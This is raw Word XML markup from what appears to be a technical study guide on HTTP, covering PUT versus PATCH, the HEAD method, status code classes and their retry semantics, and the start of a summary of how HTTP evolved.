              <w:t>CONNECT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6CF24E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rP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987B25" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rP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B907FE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rP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747509" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="61BEBBC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177FD3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>TRACE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8FBCD5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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4C28E6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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C9BA38" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>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F9FF2B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D37CDF6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PUT vs PATCH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E54770" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="838"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>PUT: Replace the entire resource with the request body. Idempotent — sending the same PUT twice results in the same state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F24AE9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="838"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>PATCH: Apply a partial modification to the resource. The body describes the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>change</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>, not the full replacement. May not be idempotent — PATCH {"increment": 1} applied twice increments twice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5830A176" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The HEAD method — underused and powerful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF1D62" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HEAD returns only headers, no body — the same headers that GET would return. Used to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4507198F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="839"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Check if a resource exists without downloading it (check Content-Length for large files before deciding to download).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6C5E70" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="839"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Check if a cached resource is still fresh (compare ETag or Last-Modified without the bandwidth cost of fetching the body).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246FC036" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="839"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Determine the size of a resource (Content-Length) before a range request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2DA311" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="6AC1DD18">
          <v:rect id="_x0000_i3578" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D5C001" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. HTTP Status Codes — The Full Semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33D7E2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Status codes communicate the outcome of a request — not just success/failure but the specific nature of the outcome with defined semantic implications for clients, caches, and load balancers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EDB3B1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1xx — Informational:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B138F27" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="840"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>100 Continue: Server received request headers, client should send the body. Used with Expect: 100-continue — client sends large request body only after server confirms it will accept it (avoids sending a 10MB body to an endpoint that will reject the request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78679CC3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="840"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>101 Switching Protocols: Server agrees to switch protocols (e.g., HTTP → WebSocket upgrade).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F5DDA0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="840"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>103 Early Hints: Server sends preliminary response with Link headers for resource preloading, before the final response is ready. Browser can start fetching CSS/JS while server processes the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28441579" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2xx — Success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F88E55" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="841"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>200 OK: Standard success. Cacheable by default with appropriate headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187948BE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="841"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>201 Created: Resource was created. Response should include Location header pointing to the new resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE87025" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="841"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>202 Accepted: Request accepted for async processing (not yet complete). Response may include a polling URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13233474" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="841"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>204 No Content: Success but no response body. Used for DELETE, or PUT/PATCH when no representation needs to be returned. Clients must not attempt to parse a response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A0071A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="841"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>206 Partial Content: Response to a Range request. Includes Content-Range header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D5CCB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3xx — Redirection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531DA43F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="842"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>301 Moved Permanently: Resource permanently at new URL. Clients should update bookmarks. </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cached indefinitely</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> by default. POST requests are typically converted to GET on redirect (historical behavior).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332F02F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="842"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>302 Found: Temporary redirect. Not cached by default. POST → GET conversion (historical behavior — technically incorrect per spec).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4435191C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="842"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>303 See Other: After POST, redirect to GET the result. Explicitly designed for POST-Redirect-GET pattern (prevents form resubmission on browser refresh).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44111F70" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="842"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>307 Temporary Redirect: Temporary redirect that </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>preserves the HTTP method</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. A POST to a 307 redirect remains POST to the new URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEFE47A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="842"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>308 Permanent Redirect: Permanent redirect that </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>preserves the HTTP method</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. Like 301 but method-preserving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111CFF87" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4xx — Client Errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2083A467" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>400 Bad Request: Malformed request syntax, invalid parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7546CC65" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>401 Unauthorized: Authentication required. Response must include WWW-Authenticate header specifying the authentication scheme. Despite the name, this is an authentication failure, not authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C3BBF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>403 Forbidden: Authenticated but not authorized. The server understood the request but refuses to fulfill it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CEE5F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>404 Not Found: Resource doesn't exist. Also used to hide existence of unauthorized resources (prefer 404 over 403 for security-sensitive resources to avoid revealing that the resource exists).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC18024" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>405 Method Not Allowed: The HTTP method is not supported for this resource. Response must include Allow header listing supported methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765D9F72" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>408 Request Timeout: Server timeout waiting for the request. Client may retry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BAC55D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>409 Conflict: Request conflicts with current resource state (e.g., optimistic locking failure, version conflict).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18323876" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>410 Gone: Resource permanently removed. Unlike 404, clients should remove cached entries and stop requesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ACB8C5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>412 Precondition Failed: Conditional request precondition failed (If-None-Match, If-Modified-Since). Used for optimistic concurrency — update fails if resource was modified since last fetch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523941DB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>413 Content Too Large: Request body exceeds server's size limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A06072" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>415 Unsupported Media Type: Server doesn't support the request body's Content-Type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A0F937" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>422 Unprocessable Entity: Request is syntactically correct but semantically invalid (validation failure). Common in REST APIs for domain validation errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728579EF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>429 Too Many Requests: Rate limit exceeded. Response should include Retry-After header. </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Do not retry immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — respect the Retry-After value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A3C68E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5xx — Server Errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7704EB75" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="844"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>500 Internal Server Error: Generic server failure. Cacheable? No — the error state may be transient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C9D859" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="844"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>502 Bad Gateway: The proxy/gateway received an invalid response from an upstream server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D9716" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="844"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>503 Service Unavailable: Server temporarily unable to handle requests (overloaded, maintenance). Response should include Retry-After.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411A0F25" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="844"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>504 Gateway Timeout: The proxy/gateway timed out waiting for an upstream server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC3C45A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="844"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>507 Insufficient Storage: Server unable to store the representation (disk full).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3450763B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The retry semantics of 5xx:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD47E7E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>500: May retry — could be transient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C055F12" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>502, 504: Should retry — upstream issue may resolve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D1153" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>503: Should retry after Retry-After — server is asking you to wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272E8A8D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>501: Don't retry — Not Implemented is permanent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F85FE31" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="2A4BDE40">
          <v:rect id="_x0000_i3579" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="127575C5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F33C37C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDF3960" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP = Application-layer protocol defining request-response semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A8DCBB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">       Format: method, URL, headers, body (request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7628EF5C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">               status code, headers, body (response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B739F53" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">       Stateless: each request independent (state managed externally — cookies, tokens)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB3F337" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="3B866A6F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP Evolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EADFBEB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  HTTP/1.0 → one TCP connection per request (devastating performance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A626CF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  HTTP/1.1 → persistent connections + pipelining (HOL blocking remains)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782BB521" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">             browsers use 6 parallel connections as workaround</w:t>
      </w:r>
    </w:p>
